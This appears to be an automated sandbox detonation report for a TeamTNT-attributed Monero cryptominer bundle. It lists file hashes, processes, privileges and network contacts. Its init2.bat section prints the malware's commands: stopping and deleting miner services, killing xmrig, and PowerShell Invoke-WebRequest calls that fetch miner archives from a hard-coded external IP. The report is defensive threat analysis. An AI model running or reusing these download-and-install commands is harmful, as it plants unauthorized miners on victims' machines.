SHA512 d31f065208766eea61facc91b23babb4c94906fb564dc06d114cbbc4068516f94032c764c188bed492509010c5dbe61f096d3e986e0ae3e70a170a9986458930

memory/3208-154-0x000001D86E280000-0x000001D86E282000-memory.dmp

memory/3208-155-0x000001D86E280000-0x000001D86E282000-memory.dmp

memory/3208-156-0x000001D86E280000-0x000001D86E282000-memory.dmp

memory/3208-157-0x000001D86E280000-0x000001D86E282000-memory.dmp

memory/3208-158-0x000001D86E280000-0x000001D86E282000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 4dd2e0b5c77bf985e686e07151ce43a1
SHA1 2a42b3bf86a3938f83c59e31cfba914da12a4d41
SHA256 0d4897422bc98a3c7a68e8a1cd657000a0b05a80db77097de1b2c3245ceafc7a
SHA512 febe1df7cc323ecd7ca1e53abfc3f51131aece0fc49085e198165733133edb9c2510b6f1e5e0181e1eb92dd70e6b43f2fa88ef0ac0ade4464cc4031fe7696ade

memory/3208-161-0x000001D86E280000-0x000001D86E282000-memory.dmp

memory/3208-162-0x000001D86E280000-0x000001D86E282000-memory.dmp

memory/3208-163-0x000001D86E280000-0x000001D86E282000-memory.dmp

memory/3208-164-0x000001D86E280000-0x000001D86E282000-memory.dmp

memory/3208-166-0x000001D86E280000-0x000001D86E282000-memory.dmp

memory/3208-182-0x000001D8701B0000-0x000001D8701B1000-memory.dmp

memory/3208-183-0x000001D870210000-0x000001D870211000-memory.dmp

C:\Users\Admin\xmrig.zip

MD5 877492e0bf1e064eef97339fd71990fd
SHA1 3f4988a2b1ca38850b8798974f01cd76815af684
SHA256 17862610ea8190e3ed4d22099d324d9058b15c941ce97236405fc80d3c50d747
SHA512 016fec4d0c9c9ad4ec6de82456bc41b1c59cfcf8c13781ce457b939f44a21b91c68decf02c05f39d4646e4480734b592c3c6753750b21836b231ab87e70f973d

memory/3208-186-0x000001D870293000-0x000001D870295000-memory.dmp

memory/3208-184-0x000001D870290000-0x000001D870292000-memory.dmp

memory/3208-187-0x000001D86E280000-0x000001D86E282000-memory.dmp

memory/1436-188-0x0000000000000000-mapping.dmp

memory/1436-189-0x000001302F5D0000-0x000001302F5D2000-memory.dmp

memory/1436-190-0x000001302F5D0000-0x000001302F5D2000-memory.dmp

memory/1436-191-0x000001302F5D0000-0x000001302F5D2000-memory.dmp

memory/1436-192-0x000001302F5D0000-0x000001302F5D2000-memory.dmp

memory/1436-193-0x000001302F5D0000-0x000001302F5D2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 fbc13122e84a66242a4f0fabcd5cf9d5
SHA1 498523ee15b697808a1d425d0f1c0e6b1d2cc22b
SHA256 46bc755334c54a648e0363cd01ced9fe3c68793e6845ae4bf7880c96e2c4f727
SHA512 4fe9dffa6b4cf4ffcc86e737d8d6f8d585b48bcaeb03fb0daf5b9234447054009dcdd236ae44afa6604689501e3666da35e8f267ec3f6a85eef30b4ad524684b

memory/1436-196-0x000001302F5D0000-0x000001302F5D2000-memory.dmp

memory/1436-198-0x000001302F5D0000-0x000001302F5D2000-memory.dmp

memory/1436-197-0x000001302F5D0000-0x000001302F5D2000-memory.dmp

memory/1436-199-0x000001302F5D0000-0x000001302F5D2000-memory.dmp

memory/1436-201-0x000001302F5D0000-0x000001302F5D2000-memory.dmp

memory/3208-204-0x000001D870296000-0x000001D870298000-memory.dmp

memory/1436-206-0x00000130311B0000-0x00000130311B2000-memory.dmp

memory/1436-207-0x00000130311B3000-0x00000130311B5000-memory.dmp

C:\Users\Admin\moneroocean\config.json

MD5 bfa626e053028f9adbfaceb5d56086c3
SHA1 acf9d3be3211c8f96b823517ea83888982d498d3
SHA256 c17e1a22b7bc00e591aede9d101b843ff2e47d5b582bb0628406bbd53b7dac78
SHA512 692115d964b98f380c0f45a9e25dc3d22bc53447c1aa76732103e7ac1807459c45348d873dcb0eeb92ca38f9a954f27078a8f4a3508ca5b4b3809a92f02765d0

memory/2780-214-0x0000000000000000-mapping.dmp

C:\Users\Admin\moneroocean\xmrig.exe

MD5 90ba713a657fe704ca05fbcfd967c245
SHA1 020c59739d08b12008554ec48af07ec35d12f178
SHA256 5ba3e2db02b76821bae00056323810032c0ebc1c54b1c93f383e31b3526ee847
SHA512 98c88ffc0909f2bf76c78b46826e2a786f7fe3872f824c7c9e7959987cd5d7b46328b01b526f4431aa047685d5c88fa5172d819d58eed4a457b70e0de023c8d3

C:\Users\Admin\moneroocean\xmrig.exe

MD5 90ba713a657fe704ca05fbcfd967c245
SHA1 020c59739d08b12008554ec48af07ec35d12f178
SHA256 5ba3e2db02b76821bae00056323810032c0ebc1c54b1c93f383e31b3526ee847
SHA512 98c88ffc0909f2bf76c78b46826e2a786f7fe3872f824c7c9e7959987cd5d7b46328b01b526f4431aa047685d5c88fa5172d819d58eed4a457b70e0de023c8d3

memory/1436-218-0x00000130311B6000-0x00000130311B8000-memory.dmp

memory/3064-219-0x0000000000000000-mapping.dmp

memory/3500-220-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a23c5e5e705de0f30711748e5b021e3a
SHA1 146daa5ef1d5bfc0ebfdcf4537221003a832ddec
SHA256 6bdddbb0686a9a4cc948e1290c586eb9ca08d1598f954520281eea544ec20125
SHA512 356545f153b2f828a046f499d2dd9809f2e1528e503c708ae4ade623b80c4f3a188a777e1019b6f591d4977330fe63d8d733eae78e896d0760593d6192880d9f

memory/3164-233-0x0000000000000000-mapping.dmp

memory/3040-235-0x0000000000000000-mapping.dmp

memory/3500-236-0x0000020BC4250000-0x0000020BC4252000-memory.dmp

memory/3500-238-0x0000020BC4253000-0x0000020BC4255000-memory.dmp

memory/3500-240-0x0000020BC4256000-0x0000020BC4258000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 cea649ddfaf4c9d0fc78102f3208ff5a
SHA1 6f87f94f33d44019a882f5caf6a69d1e28e9fc03
SHA256 7f85db2ec7f2aa30ba605ee3178e24e4c603174671b909bc4ef2cfca22af3328
SHA512 6b4eb7cb9ec616d21d5656639786cf3d67785c24b02725c8c8b6e11a032d5a38e5ca01e9ed06bd83a6289937f1cee9228019a513b205daf4fc168c6bb7667dd3

C:\Users\Admin\moneroocean\config.json

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/3924-261-0x0000000000000000-mapping.dmp

memory/3040-262-0x0000026A70F60000-0x0000026A70F62000-memory.dmp

memory/3040-264-0x0000026A70F63000-0x0000026A70F65000-memory.dmp

memory/3040-266-0x0000026A70F66000-0x0000026A70F68000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 7aae732886160c0ea69ed4b1f7d82231
SHA1 9c289c7bf92d46ff6393da7463d15f02de2415b6
SHA256 67cc09d839ff76aae15e2754f40dc0a2170812877d2e138b40c9af92f2db46f8
SHA512 8544786850eaf1e390599ebaff23208d6df5e4cd2e32290e508b66cbfea9eb2f6dffa6a049a3e0666d47a17801484bc58a57eba4002e1fd2b0bb6c997f0ea75a

C:\Users\Admin\moneroocean\config.json

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/1012-288-0x0000000000000000-mapping.dmp

memory/3924-289-0x00000296F5120000-0x00000296F5122000-memory.dmp

memory/3924-291-0x00000296F5123000-0x00000296F5125000-memory.dmp

memory/3924-293-0x00000296F5126000-0x00000296F5128000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 fab18070fd50d74b120dd23c7380730d
SHA1 1cb5b806851000947fd827b5a1ef2b5f66fc4b6d
SHA256 d072fb7c437b427761a63930fa72788e33e28f02bd69637d724036594f05782e
SHA512 a7795a2efc157457d239c775d73a7d1750433029d37f73d07468f341af8eab72f105e1ec8b5e0131c51f905d677fa5a17840f57d523e2f09b752dcdb0c53a719

C:\Users\Admin\moneroocean\config.json

MD5 115d22c264f7912e7d02307386db8c53
SHA1 fe96e575df30c6c3b4f1c3a331d6641f7061726e
SHA256 38b5c830e728ac133ac5f8153f48f0e90c74dfdbde73426de2331dde69300c9a
SHA512 0390fd713b7a413eff753f9ab5e3779cf3c0a59b0dbd701e58bae5be222c3ae846dc0605c4802a1851e1e3f371c0baf28560b5bbf98a4131857ee1e0fb864bd8

memory/1012-314-0x000002274F1C0000-0x000002274F1C2000-memory.dmp

memory/1012-315-0x000002274F1C3000-0x000002274F1C5000-memory.dmp

memory/1012-316-0x000002274F1C6000-0x000002274F1C8000-memory.dmp

memory/1600-317-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 0f07fdc2bb6d46548cc4fa428192640d
SHA1 968eb2eb678e3662dff687b18c3adba9cbfbfc28
SHA256 b9e4393b418339bee03585c1138cac1807b56ec7f1add46db438d90f8f210230
SHA512 971a83e65520e67b0b6cc2d580e759e62c385eae9b9784ef35a888a9e46264fa1c6b1675f9413d79e0d0ecde4727ff22fc54c5a5f92d8873a12bbf32c23d940d

C:\Users\Admin\moneroocean\config.json

MD5 c35b704c05e2018ce71f35b4be6d687b
SHA1 7771d19d56d23d3d6f38df5c33a2f162c2b07493
SHA256 53b163495576feeb58a418e067016223e9bcfaec0e3e2b0a7d6636c5c23b51d7
SHA512 7ecfb37d3bf84959b923f9123053456db74016afc36ce29a6a55b5a6e6fe1d6abeff71724d61b1a499f97842fd711c6e2eaa3e7b885541fd3233aff2d2a24191

memory/1200-340-0x0000000000000000-mapping.dmp

memory/1600-341-0x000001691A610000-0x000001691A612000-memory.dmp

memory/1600-343-0x000001691A613000-0x000001691A615000-memory.dmp

memory/1600-345-0x000001691A616000-0x000001691A618000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c98fef9a6f6107dc9314bb5d72716701
SHA1 8c2e869aa1b421c639c3b13e34da61b7eecdd897
SHA256 17e0f565f69c35453e8a45e4eaae8ea0f16f33839430f85aca5be9512fb12388
SHA512 ee5321f06e34022d3d66c954c46c7bef13788fe4dce4fab029579eda74a8db9777552b274abed3f3a4dab20e1dc2243bb8cb51c3af3d6c320f614ffbc3e4b993

C:\Users\Admin\moneroocean\config.json

MD5 bc60290fa5050425ae4a655f493802aa
SHA1 42df7d9c1e95a7e86c4652b7688d5ea5f03e2c47
SHA256 6d2d16f7f250d2db6686c1db275145944cfefef2bdee67bb263f815e10ca3409
SHA512 6eda5175e9dc409ee2ae09a5050d08cb910395ecbb81262fdfcc42adcdb078febabf40b4dab679d003aaf625f1645f616c56e4926d6ff331f797f5c368bab5f7

C:\Users\Admin\moneroocean\config.json

MD5 05193fd0a7804c0389d4043816400804
SHA1 9dfab5b729c059a690169de942919137643162ff
SHA256 6ec2240148b44dddc36db5b78aa92636c541940dd0e7ebfdbf209493fc1a2f52
SHA512 cc7af49aa14fd743c1a927160541934549d508e5042a8b6347986b91dee646fa61ce50b3cc16434bd628b8d005c1936ec9abe46c3370f5f9d9c0f240a3c9b997

memory/1424-367-0x0000000000000000-mapping.dmp

memory/1200-374-0x000001D3C5240000-0x000001D3C5242000-memory.dmp

memory/1200-375-0x000001D3C5243000-0x000001D3C5245000-memory.dmp

memory/1200-376-0x000001D3C5246000-0x000001D3C5248000-memory.dmp

memory/1424-377-0x000002717F050000-0x000002717F052000-memory.dmp

memory/1424-378-0x000002717F053000-0x000002717F055000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a83091216bc095616faaab798d468f77
SHA1 f6d1077e144e63da993aa76bbb7ba39c21c89a15
SHA256 f419c7896156c00eba685f53337be6a97c9c24d7a0de3d359302f75d4651ccde
SHA512 0488ed46d7276a89bd177c831c5ae63f57983ec7819042c91ba7a328d3f55aea93510a5fa91b1e200e251b6e9bd5d644a4c15faaf9bd89e2f93a29d70c336701

C:\Users\Admin\moneroocean\config_background.json

MD5 8b89a341da7415528c151ae4ab3d851c
SHA1 2b28ff8a983351ab6c73c61bb6e96135fb9368d2
SHA256 c5cbb3a890dd0ac355a4b2928d7dfc0448b53800682401457b1144b77d5339f0
SHA512 1319cd72fbc51c80a5df03ed7f67f737b1acf59eaae195cde72e5d7d33f93c044c65800467e8e10021ab1881df0e22d6d2ca9661fa51f536d09f8f943d6c96e5

memory/4016-395-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e53cd020c70375d710ffbf0044fa2067
SHA1 778d68ffb59c06ddeb792b45de3e46762665e136
SHA256 6f3b6badefd83943a29aadee6281b94771dd3c71e7884f71fafceba4843c0fd0
SHA512 f272ecd68a6417a22df2fd1c96a5a6a62ae96ae2a45e5bbe0ab890573c7b50bc699b2907a6d8a1ec2c012a793805b4beeb72a93865fb146f32948e5da49cbb1e

memory/1424-407-0x000002717F056000-0x000002717F058000-memory.dmp

memory/4016-409-0x0000020744780000-0x0000020744782000-memory.dmp

memory/4016-410-0x0000020744783000-0x0000020744785000-memory.dmp

memory/1272-419-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 450adf71e232244110fe8c26e0e58dc6
SHA1 b668392ed522f7486c91b1c1ad02c35f357dda58
SHA256 82447cb406c40e61e2ba971005d5c95836e668bd3bb774ba6f3fc217037e53e3
SHA512 2775b438a597684349e09d1abc7f0131491f486b0ec6b7ce5dfd8051672f87a280f12d92b561b84d9dedf14618eedf07febd67123477759ee7a12f024b88c0a8

memory/1272-428-0x0000025A75320000-0x0000025A75322000-memory.dmp

memory/1272-429-0x0000025A75323000-0x0000025A75325000-memory.dmp

memory/4016-426-0x0000020744786000-0x0000020744788000-memory.dmp

C:\Users\Admin\nssm.zip

MD5 7ad31e7d91cc3e805dbc8f0615f713c1
SHA1 9f3801749a0a68ca733f5250a994dea23271d5c3
SHA256 5b12c3838e47f7bc6e5388408a1701eb12c4bbfcd9c19efd418781304590d201
SHA512 d7d947bfa40d6426d8bc4fb30db7b0b4209284af06d6db942e808cc959997cf23523ffef6c44b640f3d8dbe8386ebdc041d0ecb5b74e65af2c2d423df5396260

memory/2936-455-0x0000000000000000-mapping.dmp

memory/2968-456-0x0000000000000000-mapping.dmp

memory/1532-457-0x0000000000000000-mapping.dmp

C:\Users\Admin\moneroocean\nssm.exe

MD5 1136efb1a46d1f2d508162387f30dc4d
SHA1 f280858dcfefabc1a9a006a57f6b266a5d1fde8e
SHA256 eee9c44c29c2be011f1f1e43bb8c3fca888cb81053022ec5a0060035de16d848
SHA512 43b31f600196eaf05e1a40d7a6e14d4c48fc6e55aca32c641086f31d6272d4afb294a1d214e071d5a8cce683a4a88b66a6914d969b40cec55ad88fde4077d3f5

C:\Users\Admin\moneroocean\nssm.exe

MD5 1136efb1a46d1f2d508162387f30dc4d
SHA1 f280858dcfefabc1a9a006a57f6b266a5d1fde8e
SHA256 eee9c44c29c2be011f1f1e43bb8c3fca888cb81053022ec5a0060035de16d848
SHA512 43b31f600196eaf05e1a40d7a6e14d4c48fc6e55aca32c641086f31d6272d4afb294a1d214e071d5a8cce683a4a88b66a6914d969b40cec55ad88fde4077d3f5

C:\Users\Admin\moneroocean\nssm.exe

MD5 1136efb1a46d1f2d508162387f30dc4d
SHA1 f280858dcfefabc1a9a006a57f6b266a5d1fde8e
SHA256 eee9c44c29c2be011f1f1e43bb8c3fca888cb81053022ec5a0060035de16d848
SHA512 43b31f600196eaf05e1a40d7a6e14d4c48fc6e55aca32c641086f31d6272d4afb294a1d214e071d5a8cce683a4a88b66a6914d969b40cec55ad88fde4077d3f5

memory/2884-460-0x0000000000000000-mapping.dmp

memory/1272-462-0x0000025A75326000-0x0000025A75328000-memory.dmp

memory/712-463-0x0000000000000000-mapping.dmp

C:\Users\Admin\moneroocean\nssm.exe

MD5 1136efb1a46d1f2d508162387f30dc4d
SHA1 f280858dcfefabc1a9a006a57f6b266a5d1fde8e
SHA256 eee9c44c29c2be011f1f1e43bb8c3fca888cb81053022ec5a0060035de16d848
SHA512 43b31f600196eaf05e1a40d7a6e14d4c48fc6e55aca32c641086f31d6272d4afb294a1d214e071d5a8cce683a4a88b66a6914d969b40cec55ad88fde4077d3f5

memory/3380-465-0x0000000000000000-mapping.dmp

C:\Users\Admin\moneroocean\nssm.exe

MD5 1136efb1a46d1f2d508162387f30dc4d
SHA1 f280858dcfefabc1a9a006a57f6b266a5d1fde8e
SHA256 eee9c44c29c2be011f1f1e43bb8c3fca888cb81053022ec5a0060035de16d848
SHA512 43b31f600196eaf05e1a40d7a6e14d4c48fc6e55aca32c641086f31d6272d4afb294a1d214e071d5a8cce683a4a88b66a6914d969b40cec55ad88fde4077d3f5

memory/736-467-0x0000000000000000-mapping.dmp

C:\Users\Admin\moneroocean\nssm.exe

MD5 1136efb1a46d1f2d508162387f30dc4d
SHA1 f280858dcfefabc1a9a006a57f6b266a5d1fde8e
SHA256 eee9c44c29c2be011f1f1e43bb8c3fca888cb81053022ec5a0060035de16d848
SHA512 43b31f600196eaf05e1a40d7a6e14d4c48fc6e55aca32c641086f31d6272d4afb294a1d214e071d5a8cce683a4a88b66a6914d969b40cec55ad88fde4077d3f5

memory/1512-469-0x0000000000000000-mapping.dmp

C:\Users\Admin\moneroocean\nssm.exe

MD5 1136efb1a46d1f2d508162387f30dc4d
SHA1 f280858dcfefabc1a9a006a57f6b266a5d1fde8e
SHA256 eee9c44c29c2be011f1f1e43bb8c3fca888cb81053022ec5a0060035de16d848
SHA512 43b31f600196eaf05e1a40d7a6e14d4c48fc6e55aca32c641086f31d6272d4afb294a1d214e071d5a8cce683a4a88b66a6914d969b40cec55ad88fde4077d3f5

C:\Users\Admin\moneroocean\nssm.exe

MD5 1136efb1a46d1f2d508162387f30dc4d
SHA1 f280858dcfefabc1a9a006a57f6b266a5d1fde8e
SHA256 eee9c44c29c2be011f1f1e43bb8c3fca888cb81053022ec5a0060035de16d848
SHA512 43b31f600196eaf05e1a40d7a6e14d4c48fc6e55aca32c641086f31d6272d4afb294a1d214e071d5a8cce683a4a88b66a6914d969b40cec55ad88fde4077d3f5

memory/2576-472-0x0000000000000000-mapping.dmp

C:\Users\Admin\moneroocean\xmrig.exe

MD5 90ba713a657fe704ca05fbcfd967c245
SHA1 020c59739d08b12008554ec48af07ec35d12f178
SHA256 5ba3e2db02b76821bae00056323810032c0ebc1c54b1c93f383e31b3526ee847
SHA512 98c88ffc0909f2bf76c78b46826e2a786f7fe3872f824c7c9e7959987cd5d7b46328b01b526f4431aa047685d5c88fa5172d819d58eed4a457b70e0de023c8d3

memory/2576-475-0x00000000001A0000-0x00000000001A4000-memory.dmp

memory/2436-476-0x0000000000000000-mapping.dmp

Analysis: behavioral19

Detonation Overview

Submitted

2021-10-29 19:08

Reported

2021-10-29 20:00

Platform

win7-en-20211014

Max time kernel

120s

Max time network

150s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\start.cmd"

Signatures

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\start.cmd"

C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\xmrig.exe

xmrig.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 donate.v2.xmrig.com udp
NL 199.247.27.41:3333 donate.v2.xmrig.com tcp

Files

memory/532-55-0x0000000000000000-mapping.dmp

memory/532-56-0x0000000000400000-0x0000000000420000-memory.dmp

memory/532-58-0x00000000004F0000-0x0000000000510000-memory.dmp

memory/532-57-0x0000000000450000-0x0000000000470000-memory.dmp

Analysis: behavioral26

Detonation Overview

Submitted

2021-10-29 19:08

Reported

2021-10-29 20:00

Platform

win10-en-20211014

Max time kernel

121s

Max time network

158s

Command Line

"C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\xmrig\xmrig.exe"

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\xmrig\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\xmrig\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\xmrig\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\xmrig\xmrig.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 time.windows.com udp
NL 20.101.57.9:123 time.windows.com udp

Files

memory/4012-116-0x0000000000170000-0x0000000000190000-memory.dmp

memory/4012-117-0x00000000001B0000-0x00000000001B4000-memory.dmp

Analysis: behavioral30

Detonation Overview

Submitted

2021-10-29 19:08

Reported

2021-10-29 20:00

Platform

win7-en-20210920

Max time kernel

122s

Max time network

143s

Command Line

"C:\Users\Admin\AppData\Local\Temp\nssm.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\nssm.exe

"C:\Users\Admin\AppData\Local\Temp\nssm.exe"

Network

N/A

Files

N/A

Analysis: behavioral32

Detonation Overview

Submitted

2021-10-29 19:08

Reported

2021-10-29 19:57

Platform

win7-en-20211014

Max time kernel

0s

Max time network

2s

Command Line

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.13.1\WinRing0x64.sys.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\xmrig-6.13.1\WinRing0x64.sys.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.13.1\WinRing0x64.sys.exe"

Network

N/A

Files

N/A

Analysis: behavioral13

Detonation Overview

Submitted

2021-10-29 19:08

Reported

2021-10-29 20:00

Platform

win7-en-20211014

Max time kernel

121s

Max time network

121s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\init2.bat"

Signatures

Stops running service(s)

evasion

Launches sc.exe

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 656 wrote to memory of 704 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 656 wrote to memory of 704 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 656 wrote to memory of 704 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 704 wrote to memory of 1500 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 704 wrote to memory of 1500 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 704 wrote to memory of 1500 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 656 wrote to memory of 1640 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\where.exe
PID 656 wrote to memory of 1640 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\where.exe
PID 656 wrote to memory of 1640 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\where.exe
PID 656 wrote to memory of 856 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\where.exe
PID 656 wrote to memory of 856 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\where.exe
PID 656 wrote to memory of 856 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\where.exe
PID 656 wrote to memory of 636 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\where.exe
PID 656 wrote to memory of 636 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\where.exe
PID 656 wrote to memory of 636 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\where.exe
PID 656 wrote to memory of 1004 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\where.exe
PID 656 wrote to memory of 1004 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\where.exe
PID 656 wrote to memory of 1004 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\where.exe
PID 656 wrote to memory of 880 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\where.exe
PID 656 wrote to memory of 880 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\where.exe
PID 656 wrote to memory of 880 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\where.exe
PID 656 wrote to memory of 1368 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 656 wrote to memory of 1368 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 656 wrote to memory of 1368 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 656 wrote to memory of 740 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\sc.exe
PID 656 wrote to memory of 740 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\sc.exe
PID 656 wrote to memory of 740 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\sc.exe
PID 656 wrote to memory of 1776 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\sc.exe
PID 656 wrote to memory of 1776 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\sc.exe
PID 656 wrote to memory of 1776 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\sc.exe
PID 656 wrote to memory of 1616 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 656 wrote to memory of 1616 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 656 wrote to memory of 1616 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 656 wrote to memory of 836 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 656 wrote to memory of 836 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 656 wrote to memory of 836 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 656 wrote to memory of 1564 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 656 wrote to memory of 1564 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 656 wrote to memory of 1564 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 656 wrote to memory of 2044 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 656 wrote to memory of 2044 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 656 wrote to memory of 2044 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\init2.bat"

C:\Windows\system32\net.exe

net session

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Windows\system32\where.exe

where powershell

C:\Windows\system32\where.exe

where find

C:\Windows\system32\where.exe

where findstr

C:\Windows\system32\where.exe

where tasklist

C:\Windows\system32\where.exe

where sc

C:\Windows\system32\timeout.exe

timeout 2

C:\Windows\system32\sc.exe

sc stop moneroocean_miner

C:\Windows\system32\sc.exe

sc delete moneroocean_miner

C:\Windows\system32\taskkill.exe

taskkill /f /t /im xmrig.exe

C:\Windows\system32\timeout.exe

timeout 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'http://85.214.149.236:443/sugarcrm/themes/default/images/SugarLogic/win/xmrig.zip' -OutFile 'C:\Users\Admin\xmrig.zip'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'http://85.214.149.236:443/sugarcrm/themes/default/images/SugarLogic/win/xmrig-6.13.1-msvc-win64.zip' -OutFile 'C:\Users\Admin\xmrig.zip'"

Network

N/A

Files

